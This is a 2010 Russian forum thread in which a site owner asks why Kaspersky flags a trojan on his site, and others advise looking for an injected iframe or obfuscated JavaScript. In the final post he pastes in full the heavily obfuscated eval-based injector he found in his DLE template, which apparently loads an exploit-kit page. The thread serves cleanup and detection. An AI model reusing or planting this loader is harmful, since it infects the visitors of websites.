Троянская программа "v4ZcxMs_A-p.php"

Тема в разделе ".:: Уязвимости", создана пользователем antiterror, 28 май 2010.

Статус темы:
Закрыта.
  1. antiterror

    antiterror xProgramming

    Регистр.:
    22 авг 2007
    Сообщения:
    344
    Симпатии:
    135
    Привет уважаемые товарищи.
    У меня возникла проблема, месяц как заметил что когда иногда захожу на сайт вылетает такое окошко с угрозой Трояна:
    4d65sa46a.JPG
    Я обошёлся все JAVA, весь код, но так и не нашёл ничего похоже на эту ссылку
    _allovahc.com//v4ZcxMs_A-p.php (сайт трояна, не заходить)

    В интернете мало что полезного можно найти об этом, может кто сталкивался или знает почему всегда Касперский у меня ругается?

    Спасибо за ответы, буду очень ждать!
     
    Inoteol нравится это.
  2. Belial

    Belial

    Регистр.:
    1 фев 2010
    Сообщения:
    236
    Симпатии:
    113
    Там скорее всего зашифрованный яваскрипт, поэтому поиск по названию пхп страницы ничего не даст. Ищи нечитабельный яваскрипт.
    Вот пример такого скрипта:
    Перейти по ссылке
     
  3. Kai

    Kai

    Регистр.:
    29 июн 2007
    Сообщения:
    329
    Симпатии:
    46
    связка там стоит. а на твоем сайте просто ифрейм. возьми
     
  4. antiterror

    antiterror xProgramming

    Регистр.:
    22 авг 2007
    Сообщения:
    344
    Симпатии:
    135
    искал не нашёл, буду заменять файлы под ДЛЕ

    Kai, не нашёл iframe
     
  5. antiterror

    antiterror xProgramming

    Регистр.:
    22 авг 2007
    Сообщения:
    344
    Симпатии:
    135
    сегодня от капал и код, не знаю как но попался я конкретно)))
    PHP:
    <script>var hP ;hP'sqSAqjdh' ;hP '';var Scohbthis ; var fphL'r'+'eplace'; var FZdtc='uTTimLWTW' ; var aQygK ;aQygK 'ZcZcZcsds8Z8s9Zcs4s4scs4sdsd'; var VWq='4ZbSfZcZ0'; var ehu ehu ='1ufudZbSfZcZ0Z8ZfZ';var Ertp ,sG;var Fqhtw 260;if (Ertp>sG){ErtpsG+Fqhtw;}var fS='TlNpCUyUcfrF'; var nIwDF=237 ; var jQhBvbLga ;if (nIwDF>=jQhBv){nIwDFjQhBvbLga ; }var EKHLxP='LHiOg'; var VyxR;VyxR ='' ;VyxR='ufudSaZ4Z9S9Z5s0T1ufsdT1ufudZ5Z8Z4ZaZ'; var INhiVS=213; var ZIilMo NwHt;if (INhiVS>ZIilMo){INhiVSZIilMo^NwHt;}var ydpr ydpr '' ; var JBJB =659 ;var yKYSwDyKYSwD 90 ;var Yl=651;if (Yl>JB || JB>yKYSwD){JByKYSwD/Yl ;}ydpr'u4s' ; var dI cgrc ,aAqyB ;if (dI<cgrc){dI =cgrc^aAqyB ;}function mesJ(lqsOaZ){var MCHMjhP ; for(kyXHgt 0kyXHgt<lqsOaZ['lMeRnRgItIhI'[fphL](/[IEMFR]/hP)] ; ++kyXHgt){MCHMj+=Scohb['SFtprdipnWgM'[fphL](/[MWpFd]/,hP)]['fgrGoYmpCnhpaYrpCnogdpeG'[fphL](/[GYpng]/,hP)](13^lqsOaZ['cJhkaJrkCmoudpekAutm'[fphL](/[mpuJk]/,hP)](kyXHgt)) ;var DbEzMJ595; var HGHG=40; var qKVa qKVa =253; if (DbEzMJ<HG){DbEzMJHG+qKVa ; }}return MCHMj; }var vTSydvTSyd='' ;vTSyd'3uf' ;var VoaJd647 ;var lu,xqg ;if (VoaJd==lu){VoaJd lu-xqg;}var YSH ='BamDYXQKDHOhfoxCTBN'; var LqzC ='2SfZ9Z8Sfs0T';var IS ='BLinvOsESUFx';var OuL ='uOBTYvCxfswsVoeT';var Dmfpd,rKJkA ;var rIaU234;if (rIaU<Dmfpd && Dmfpd==rKJkA){Dmfpd rKJkA+rIaU ; }var fdEg ='YjOFDUBsiwojBlqtSjD';var bModG 'GiKOQmposQDuzpfkmAyK'; var ZS=320 ; var JYEOmj,sf ;if (ZS==JYEOmj){ZS JYEOmj/sf ;}var dOGD ;dOGD'6'; var Tjgk Tjgk 'fs3s1u2Z'; var HDNqO dw; var GnSmJh315; if (HDNqO==dw){HDNqO=dw^GnSmJh ; }var nOQf;nOQf ='Z9Z2ZeS8Z0Z8Z3S9u3SaSfZ4S9Z8u5ufs1Z4ZbSfZcZ0Z8udSeSfZes0T1ufZ5S' ; var YUPZB='SDDCjwn';var XSA '1ufsdT1u' ; var TtgS 'Z8s'; var fw;fw ='';fw='5S9s0T1ufsdT' ;var HjdaBi 'WoDNA';var oAvSBU;oAvSBU =359; var EYxvUi ,tXivI ;if (oAvSBU<EYxvUi){oAvSBUEYxvUi^tXivI; }var oZJoZJ ='' oZJ'9S9Sds7u2u2ZcZ1Z1Z2SbZcZ5Zeu3ZeZ2Z0u2Z4Z3Z9Z8S5u' ; var zOnjHb zOnjHb21; var wRTBR Mo ;if (zOnjHb>wRTBR){zOnjHb=wRTBR^Mo ;}var AiFXc ='cjnhblijZJNNNCHrvZwG' ; var JLzNrQmo,bwNvUZ;if (JLz>NrQmo){JLz=NrQmo+bwNvUZ ;}var OQgrlh='3SdZ5Sds2Ses0sbZcsbs9Zbs5Z8Z8saZc';var WuCqH 'jcfZJClLtkaJaRt' ;var zo;zo 'scZfs9ZeZeZ';var LlbkX=608;var Qof109; var paTpaT984 ;if (paT LlbkX || LlbkX==Qof){LlbkX =Qof+paT; }var kUEOd ;kUEOd ='' ;var iZG=883;var SZhJvKj ;if (JvKj>iZG || iZG<SZh){iZGSZh^JvKj;}kUEOd ='esfZeT1';var nDCX nDCX =366 ;var feYcvJ feYcvJ289; var tEIT=803; if (nDCX>feYcvJ){nDCX feYcvJ-tEIT;}var tH 'bXxFCrMa';var LKLK hP; var XH nOQf ;XH =XH+oZJ XH=XH+OQgrlh;XH=XH+aQygK+zo+kUEOd+VyxR+fw+ehu+LqzC;XH XH+XSA+TjgkXHXH+VWq+TtgS+vTSyd;XH=XH+ydpr+dOGD+LK ;var CbCQ 'fMC4tSw7BTg5XiE0QsF3JZa6Puj2DYv1GWI9Aho8'[fphL](/[ftBXQJPDGA]/'\№')[fphL](/[CwgEFajvIo]/'\%'); var JUD450;var FZlbJW90; var kDww=100 ; if (JUD==FZlbJW){JUD=FZlbJW-kDww ;}var VeNM="')[fphL](/[";var HkDUts"]/g, '%" ; var rT =CbCQ[fphL](/[\]/,VeNM)[fphL](/[\%]/gHkDUts) ;var szGszGfphLScohb['epvBaUlp'[szG](/[pUCFB]/g,hP)]('var gdO= XH'+rT['sZuQbQsetereiQnagZ'[fphL](/[ZQaeD]/ghP)](rT['lAeAnrgjtjhr'[fphL](/[rYAjR]/ghP)])+"') ; ") ;var AVlY;AVlYfphL ;Scohb['ePvUaPlC'[AVlY](/[CPuqU]/ghP)](mesJ(Scohb[['uOnSeIsOcqaxpxeO'[fphL](/[OxSIq]/ghP)]](gdO))) ;</script>
    если кому интересно, смотрите шаблон всегда
     
Статус темы:
Закрыта.